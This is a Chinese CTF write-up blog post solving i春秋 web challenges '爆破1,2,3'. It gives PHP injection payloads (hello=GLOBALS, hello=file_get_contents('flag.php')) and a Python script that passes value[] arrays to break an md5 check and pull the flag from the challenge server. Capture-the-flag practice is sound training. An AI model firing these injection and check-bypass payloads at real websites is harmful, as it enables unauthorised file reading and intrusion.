美文网首页
i春秋CTF WEB-爆破

i春秋CTF WEB-爆破

作者: V0W | 来源:发表于2018-09-05 22:00 被阅读0次

爆破1,2,3

看似是爆破,其实可以直接GLOBALS查看所有的全局变量,其实考的是文件包含,六位字符的爆破实在是耗费时间==、

  1. hello=GLOBALS

  2. hello=file_get_contents('flag.php')

  3. 只要第一次传进去的value与session中的相等,则网页会输出下一个value值,通过使用md5函数不能对数组进行处理的漏洞来绕过substr(md5($value),5,4)==0的判断,使nums得值大于10即可得到flag

    python脚本

    # coding:utf-8
    import requests
    
    url = "http://344cb89508694654883e6e22c6fca5d6bbacd6e5f0b44746.game.ichunqiu.com/?value[]=ea"
    
    al = ['abcdefghijklmnopqrstuvwxyz']
    
    s = requests.session()
    
    r = s.get(url)
    
    for i in range(20):
        url = "http://344cb89508694654883e6e22c6fca5d6bbacd6e5f0b44746.game.ichunqiu.com/?value[]=" + r.content[0:2]
        r = s.get(url)
        if 'flag{' in r.content:
         print r.content[0:50]
         break
        else:
         print r.content[0:2]
    

相关文章

  • i春秋CTF WEB-爆破

    爆破1,2,3 看似是爆破,其实可以直接GLOBALS查看所有的全局变量,其实考的是文件包含,六位字符的爆破实在是...

  • i春秋CTF Upload

    分析 可以上传任意文件,并且上传之后可以打开文件(源码有链接/u/xx.php),想到上传一段php代码来打开fl...

  • i春秋 ctf web

    爆破-1 全局变量$GLOBALS?hello=GLOBALS 爆破-2 命令注入?hello=);show_so...

  • i春秋CTF-YeserCMS

    分析 打开网站,在文档下载页面用户评论区域,发现是一个EasyCMS 于是百度EasyCMS的漏洞,发现cmsea...

  • CTF中的几种git泄露

    git泄露是常见的ctf题型,来看几个例子 Hello World (i春秋 第二届春秋欢乐赛 web) 这里只说...

  • i春秋CTF-WEB-Code

    分析 打开url,发现是一个读取文件的过程,一开始还以为是文件包含,其实直接读文件即可: 读了一下index.ph...

  • i春秋CTF大本营

    百度杯”CTF比赛 九月场Code 分析:1、看到链接想到文件包含,读取index.php,发现源代码解密如下: ...

  • BUSTED--商业即兴54

    BUSTED爆破 I THINK BY NOW I HAVE MADE IT CLEAR that while t...

  • 爱春秋-爆破-3

    实际上是给了一个php代码,进行代码审计: 来看一下函数作用:error_reporting(0); ——关闭错误...

  • WEB安全之如何挖掘弱口令

    WEB安全之如何挖掘弱口令 转载 i春秋 0x01前言 我知道我起这个标题会被很多人鄙视,不就是爆破么?搞得像是谁...

网友评论

      本文标题:i春秋CTF WEB-爆破

      本文链接:https://www.haomeiwen.com/subject/wdizwftx.html